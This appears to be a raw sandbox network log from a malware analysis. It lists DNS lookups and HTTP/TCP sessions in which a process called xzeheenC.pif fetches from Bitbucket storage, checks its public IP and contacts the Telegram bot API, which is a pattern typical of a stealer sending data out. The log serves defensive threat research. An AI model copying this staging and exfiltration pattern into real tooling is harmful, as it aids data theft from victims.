                                                                                                        Dec 18, 2024 16:32:08.335577011 CET49857443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:08.335612059 CET44349857149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:08.335697889 CET49857443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:08.335705996 CET44349857149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:08.901420116 CET44349857149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:08.901644945 CET44349857149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:08.901868105 CET49857443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:08.902133942 CET49857443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:08.903276920 CET49865443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:08.903326035 CET44349865149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:08.903403044 CET49865443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:08.903666973 CET49865443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:08.903680086 CET44349865149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.118969917 CET44349862149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.120660067 CET49862443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:09.120690107 CET44349862149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.120887041 CET49862443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:09.120892048 CET44349862149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.636991024 CET44349864149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.638804913 CET49864443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:09.638832092 CET44349864149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.639008045 CET49864443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:09.639014959 CET44349864149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.703571081 CET44349862149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.706032991 CET44349862149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.706130981 CET49862443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:09.706481934 CET49862443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:09.708220959 CET49870443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:09.708268881 CET44349870149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:09.708359003 CET49870443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:09.708594084 CET49870443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:09.708605051 CET44349870149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.250981092 CET44349864149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.251070023 CET44349864149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.251144886 CET49864443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.251648903 CET49864443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.262669086 CET49872443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.262748957 CET44349872149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.263634920 CET49872443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.264667034 CET49872443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.264697075 CET44349872149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.265932083 CET44349865149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.267560005 CET49865443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.267580032 CET44349865149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.267659903 CET49865443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.267672062 CET44349865149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.902497053 CET44349865149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.902584076 CET44349865149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.902692080 CET49865443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.910176992 CET49865443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.986953974 CET49873443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.987013102 CET44349873149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:10.987088919 CET49873443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.992202044 CET49873443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:10.992232084 CET44349873149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:11.092118979 CET44349870149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:11.094841957 CET49870443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:11.094862938 CET44349870149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:11.094943047 CET49870443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:11.094953060 CET44349870149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:11.635437965 CET44349872149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:11.643065929 CET49872443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:11.643094063 CET44349872149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:11.643170118 CET49872443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.587889910 CET44349908149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.587980032 CET49908443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.587985992 CET44349908149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.724169016 CET44349906149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.724385023 CET44349906149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.724456072 CET49906443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.724786043 CET49906443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.726147890 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.726197958 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:21.726284027 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.726583958 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:21.726605892 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.213272095 CET44349908149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.213370085 CET44349908149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.213674068 CET49908443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.214044094 CET49908443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.215446949 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.215504885 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.215589046 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.215837002 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.215852022 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.419882059 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.424751997 CET49913443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.424768925 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:22.427059889 CET49913443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:22.427067041 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.000848055 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.000930071 CET44349913149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.000993013 CET49913443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.001616955 CET49913443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.003386974 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.003436089 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.003501892 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.003844976 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.003855944 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.121129990 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.123270988 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.123320103 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.123625994 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.123635054 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.616189003 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.617899895 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.617930889 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.618021965 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.618027925 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.920447111 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.920552015 CET44349914149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.920636892 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.921175957 CET49914443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.960850954 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.960899115 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:23.960975885 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.961293936 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:23.961306095 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.408140898 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.409883022 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.409904003 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.409981012 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.409986019 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.526465893 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.526591063 CET44349915149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.526638985 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.527271986 CET49915443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.528753042 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.528775930 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:24.528842926 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.529164076 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:24.529174089 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.067285061 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.067506075 CET44349920149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.067579985 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.068094969 CET49920443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.069344044 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.069374084 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.069477081 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.069762945 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.069773912 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.333070040 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.334904909 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.334928036 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.335028887 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.335035086 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.894042969 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.894135952 CET44349922149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.894378901 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.894707918 CET49922443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.896127939 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.896167994 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.896382093 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.896637917 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.896658897 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.981841087 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.983694077 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.983714104 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:25.987601995 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:25.987610102 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.434979916 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.436826944 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.436852932 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.437063932 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.437069893 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.538923979 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.540137053 CET44349924149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.540198088 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.540587902 CET49924443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.545176029 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.545206070 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.545609951 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.587347984 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.587364912 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.985013008 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.985100031 CET44349927149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.985249043 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.985734940 CET49927443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.987075090 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.987113953 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:26.987175941 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.987447023 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:26.987461090 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.261293888 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.263442993 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.263472080 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.263530016 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.263537884 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.815290928 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.815469027 CET44349930149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.815783024 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.817275047 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.817277908 CET49930443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.817315102 CET44349938149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.819915056 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.819915056 CET49938443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:27.819950104 CET44349938149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:27.997864008 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.002296925 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.002324104 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.002422094 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.002425909 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.355017900 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.358289003 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.358309031 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.358380079 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.358390093 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.582938910 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.584399939 CET44349931149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.584475994 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.585230112 CET49931443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.586936951 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.586993933 CET44349939149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.587126017 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.587528944 CET49939443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.587564945 CET44349939149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.906186104 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.906281948 CET44349934149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.906331062 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.907102108 CET49934443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.945394993 CET49940443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.945522070 CET44349940149.154.167.220192.168.2.8
                                                                                                        Dec 18, 2024 16:32:28.945591927 CET49940443192.168.2.8149.154.167.220
                                                                                                        Dec 18, 2024 16:32:28.945960045 CET49940443192.168.2.8149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 16:30:30.686155081 CET | 54555 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 16:30:30.823501110 CET | 53 | 54555 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 16:30:33.178805113 CET | 49549 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 16:30:33.493093967 CET | 53 | 49549 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 16:30:40.436945915 CET | 62103 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 16:30:40.670293093 CET | 53 | 62103 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 16:30:48.074112892 CET | 61232 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 16:30:48.211654902 CET | 53 | 61232 | 1.1.1.1 | 192.168.2.8
Dec 18, 2024 16:31:01.981468916 CET | 58764 | 53 | 192.168.2.8 | 1.1.1.1
Dec 18, 2024 16:31:02.126786947 CET | 53 | 58764 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 16:30:30.686155081 CET | 192.168.2.8 | 1.1.1.1 | 0xaeec | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:33.178805113 CET | 192.168.2.8 | 1.1.1.1 | 0x7945 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:40.436945915 CET | 192.168.2.8 | 1.1.1.1 | 0x6b37 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:48.074112892 CET | 192.168.2.8 | 1.1.1.1 | 0x8181 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:31:01.981468916 CET | 192.168.2.8 | 1.1.1.1 | 0xccf | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 16:30:30.823501110 CET | 1.1.1.1 | 192.168.2.8 | 0xaeec | No error (0) | bitbucket.org | - | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:30.823501110 CET | 1.1.1.1 | 192.168.2.8 | 0xaeec | No error (0) | bitbucket.org | - | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:30.823501110 CET | 1.1.1.1 | 192.168.2.8 | 0xaeec | No error (0) | bitbucket.org | - | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 54.231.224.185 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.59.161 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 16.15.176.52 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 54.231.198.81 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.27.220 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 54.231.235.89 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.24.78 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:33.493093967 CET | 1.1.1.1 | 192.168.2.8 | 0x7945 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 54.231.130.233 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:40.670293093 CET | 1.1.1.1 | 192.168.2.8 | 0x6b37 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 16:30:40.670293093 CET | 1.1.1.1 | 192.168.2.8 | 0x6b37 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:40.670293093 CET | 1.1.1.1 | 192.168.2.8 | 0x6b37 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:40.670293093 CET | 1.1.1.1 | 192.168.2.8 | 0x6b37 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:40.670293093 CET | 1.1.1.1 | 192.168.2.8 | 0x6b37 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:40.670293093 CET | 1.1.1.1 | 192.168.2.8 | 0x6b37 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:30:48.211654902 CET | 1.1.1.1 | 192.168.2.8 | 0x8181 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 16:31:02.126786947 CET | 1.1.1.1 | 192.168.2.8 | 0xccf | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                        • bitbucket.org
                                                                                                        • bbuseruploads.s3.amazonaws.com
                                                                                                        • api.telegram.org
                                                                                                        • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 132.226.8.169 | 80 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 16:30:40.799964905 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 18, 2024 16:30:42.203200102 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 15:30:41 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49713 | 132.226.8.169 | 80 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 16:30:54.462153912 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 18, 2024 16:30:55.905942917 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 15:30:55 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
